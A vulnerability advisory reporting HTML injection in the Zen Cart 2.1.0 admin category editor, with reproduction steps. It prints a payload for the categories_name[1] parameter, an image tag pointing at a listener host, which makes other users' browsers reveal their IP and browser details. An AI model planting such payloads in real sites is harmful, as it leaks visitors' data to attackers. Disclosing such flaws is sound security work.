Zencart | Information disclosure via HTML injection
Information
| Software Type | Web App |
|---|---|
| Software Name | Zen-Cart |
| Affected Version | 2.1.0 |
| Software Vendor | Zen Ventures, LLC |
| Software Link | https://github.com/zencart/zencart |
| Severity | Medium |
| CVSS Score | 4.8 |
| CVE Link | N/A |
| Affected Assets | 30171+ |
| Date of Discovery | Jan 9th, 2025 |
| PoC Exploit | N/A |
Description
The [/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing] endpoint has a listing of catalogs of categories of products. Each category can be modified through [/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category] endpoint.
This endpoint doesn't sanitize data passed to [categories_name[1]] parameter, an attacker could inject HTML here to grab IP and browser data of other users.
Reproduce
Open a category for editing:
/zencart/Horse-Kgc-fRizz/index.php?cmd=categories&cPath=&cID=1&action=edit_category
Use the following payload inside [categories_name[1]] parameter:
<img/src=http://127.0.0.1:1718>
Now anytime someone browses the categories page, you will be able to collect their IP or browser info:
/zencart/Horse-Kgc-fRizz/index.php?cmd=category_product_listing
Proof of Concept (PoC) Video
Posted on: May 24, 2025 06:06 AM